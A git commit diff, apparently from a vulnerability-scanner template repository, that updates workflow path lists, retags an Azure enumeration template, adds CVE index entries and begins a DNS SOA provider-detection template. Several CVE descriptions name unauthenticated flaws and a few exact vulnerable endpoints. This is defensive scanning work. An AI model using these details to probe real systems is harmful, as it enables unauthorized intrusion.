Merge branch 'main' into fuzzing-templates
commit
3c9125f3ed
|
@ -3,6 +3,9 @@ on:
|
|||
push:
|
||||
paths:
|
||||
- '.new-additions'
|
||||
- 'dns/soa-detect.yaml'
|
||||
- 'dns/spf-record-detect.yaml'
|
||||
- 'dns/txt-service-detect.yaml'
|
||||
- 'file/keys/dependency/dependency-track.yaml'
|
||||
- 'file/keys/docker/dockerhub-pat.yaml'
|
||||
- 'file/keys/doppler/doppler-audit.yaml'
|
||||
|
@ -32,7 +35,9 @@ on:
|
|||
- 'http/cves/2023/CVE-2023-49785.yaml'
|
||||
- 'http/cves/2023/CVE-2023-5830.yaml'
|
||||
- 'http/cves/2023/CVE-2023-5914.yaml'
|
||||
- 'http/cves/2024/CVE-2024-1212.yaml'
|
||||
- 'http/cves/2024/CVE-2024-1698.yaml'
|
||||
- 'http/cves/2024/CVE-2024-27954.yaml'
|
||||
- 'http/exposed-panels/bynder-panel.yaml'
|
||||
- 'http/exposed-panels/cisco/cisco-expressway-panel.yaml'
|
||||
- 'http/exposed-panels/emqx-panel.yaml'
|
||||
|
@ -42,11 +47,14 @@ on:
|
|||
- 'http/exposed-panels/osnexus-panel.yaml'
|
||||
- 'http/exposed-panels/posteio-admin-panel.yaml'
|
||||
- 'http/exposed-panels/skeepers-panel.yaml'
|
||||
- 'http/exposures/files/generic-db.yaml'
|
||||
- 'http/misconfiguration/installer/posteio-installer.yaml'
|
||||
- 'http/osint/phishing/kakao-login-phish.yaml'
|
||||
- 'http/osint/phishing/naver-login-phish.yaml'
|
||||
- 'http/technologies/directus-detect.yaml'
|
||||
- 'http/technologies/microsoft/aspnet-version-detect.yaml'
|
||||
- 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml'
|
||||
- 'http/technologies/wing-ftp-service-detect.yaml'
|
||||
- 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml'
|
||||
- 'network/detection/wing-ftp-detect.yaml'
|
||||
workflow_dispatch:
|
||||
|
|
|
@ -1,3 +1,6 @@
|
|||
dns/soa-detect.yaml
|
||||
dns/spf-record-detect.yaml
|
||||
dns/txt-service-detect.yaml
|
||||
file/keys/dependency/dependency-track.yaml
|
||||
file/keys/docker/dockerhub-pat.yaml
|
||||
file/keys/doppler/doppler-audit.yaml
|
||||
|
@ -27,7 +30,9 @@ file/keys/wireguard/wireguard-private.yaml
|
|||
http/cves/2023/CVE-2023-49785.yaml
|
||||
http/cves/2023/CVE-2023-5830.yaml
|
||||
http/cves/2023/CVE-2023-5914.yaml
|
||||
http/cves/2024/CVE-2024-1212.yaml
|
||||
http/cves/2024/CVE-2024-1698.yaml
|
||||
http/cves/2024/CVE-2024-27954.yaml
|
||||
http/exposed-panels/bynder-panel.yaml
|
||||
http/exposed-panels/cisco/cisco-expressway-panel.yaml
|
||||
http/exposed-panels/emqx-panel.yaml
|
||||
|
@ -37,10 +42,13 @@ http/exposed-panels/neocase-hrportal-panel.yaml
|
|||
http/exposed-panels/osnexus-panel.yaml
|
||||
http/exposed-panels/posteio-admin-panel.yaml
|
||||
http/exposed-panels/skeepers-panel.yaml
|
||||
http/exposures/files/generic-db.yaml
|
||||
http/misconfiguration/installer/posteio-installer.yaml
|
||||
http/osint/phishing/kakao-login-phish.yaml
|
||||
http/osint/phishing/naver-login-phish.yaml
|
||||
http/technologies/directus-detect.yaml
|
||||
http/technologies/microsoft/aspnet-version-detect.yaml
|
||||
http/technologies/microsoft/aspnetmvc-version-disclosure.yaml
|
||||
http/technologies/wing-ftp-service-detect.yaml
|
||||
http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml
|
||||
network/detection/wing-ftp-detect.yaml
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: cloud,cloud-enum,azure,bruteforce,enum
|
||||
tags: cloud,cloud-enum,azure,fuzz,enum
|
||||
|
||||
self-contained: true
|
||||
|
||||
|
@ -63,4 +63,4 @@ dns:
|
|||
part: answer
|
||||
words:
|
||||
- "IN\tA"
|
||||
# digest: 4a0a00473045022100ad529d9d011c813ce7e0cb419a8440ca3f0bef3ca063b85560dbc678d6eb7056022022aa46f55179a7b72c6a02dcda0444e0aba98ddaa781c8118d39acd5cafdeaaf:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950
|
14
cves.json
14
cves.json
|
@ -1386,7 +1386,7 @@
|
|||
{"ID":"CVE-2021-40149","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Private Key Disclosure","Severity":"medium","Description":"Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2021/CVE-2021-40149.yaml"}
|
||||
{"ID":"CVE-2021-40150","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Information Disclosure","Severity":"high","Description":"Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40150.yaml"}
|
||||
{"ID":"CVE-2021-40323","Info":{"Name":"Cobbler \u003c3.3.0 - Remote Code Execution","Severity":"critical","Description":"Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40323.yaml"}
|
||||
{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 - Mod_Proxy SSRF","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"}
|
||||
{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 Mod_Proxy - Server-Side Request Forgery","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"}
|
||||
{"ID":"CVE-2021-40539","Info":{"Name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40539.yaml"}
|
||||
{"ID":"CVE-2021-40542","Info":{"Name":"Opensis-Classic 8.0 - Cross-Site Scripting","Severity":"medium","Description":"Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40542.yaml"}
|
||||
{"ID":"CVE-2021-40651","Info":{"Name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","Severity":"medium","Description":"OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-40651.yaml"}
|
||||
|
@ -2171,7 +2171,7 @@
|
|||
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
|
||||
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
|
||||
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
|
||||
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
|
||||
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
|
||||
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
|
||||
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
|
||||
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
|
||||
|
@ -2227,6 +2227,7 @@
|
|||
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
|
||||
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
|
||||
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
|
||||
{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"}
|
||||
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
|
||||
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
|
||||
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
|
||||
|
@ -2257,8 +2258,10 @@
|
|||
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
|
||||
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
|
||||
{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"}
|
||||
{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"}
|
||||
{"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"}
|
||||
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
|
||||
{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
|
||||
{"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"}
|
||||
{"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"}
|
||||
{"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
|
||||
|
@ -2267,6 +2270,8 @@
|
|||
{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"}
|
||||
{"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"}
|
||||
{"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"}
|
||||
{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"}
|
||||
{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"}
|
||||
{"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"}
|
||||
{"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"}
|
||||
{"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"}
|
||||
|
@ -2295,6 +2300,8 @@
|
|||
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
|
||||
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
|
||||
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
|
||||
{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"}
|
||||
{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
|
||||
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
|
||||
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
|
||||
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
|
||||
|
@ -2307,6 +2314,9 @@
|
|||
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
|
||||
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
|
||||
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
|
||||
{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"}
|
||||
{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"}
|
||||
{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"}
|
||||
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
|
||||
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
|
||||
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
|
||||
|
|
|
@ -1 +1 @@
|
|||
d1c0809e63305403ca431401cfcebe07
|
||||
0718093f8377862f2723b488bb15e23a
|
||||
|
|
|
@ -0,0 +1,84 @@
|
|||
id: soa-detect
|
||||
|
||||
info:
|
||||
name: SOA Record Service - Detection
|
||||
author: rxerium
|
||||
severity: info
|
||||
description: |
|
||||
Detects which domain provider a domain is using, detected through SOA records
|
||||
reference:
|
||||
- https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
tags: dns,soa
|
||||
|
||||
dns:
|
||||
- name: "{{FQDN}}"
|
||||
|
||||
type: SOA
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
name: "cloudflare"
|
||||
words:
|
||||
- "dns.cloudflare.com"
|
||||
|
||||
- type: word
|
||||
name: "amazon-web-services"
|
||||
words:
|
||||
- "awsdns"
|
||||
|
||||
- type: word
|
||||
name: "akamai"
|
||||
words:
|
||||
- "hostmaster.akamai.com"
|
||||
|
||||
- type: word
|
||||
name: "azure"
|
||||
words:
|
||||
- "azure-dns.com"
|
||||
|
||||
- type: word
|
||||
name: "ns1"
|
||||
words:
|
||||
- "nsone.net"
|
||||
|
||||
- type: word
|
||||
name: "verizon"
|
||||
words:
|
||||
- "verizon.com"
|
||||
|
||||
- type: word
|
||||
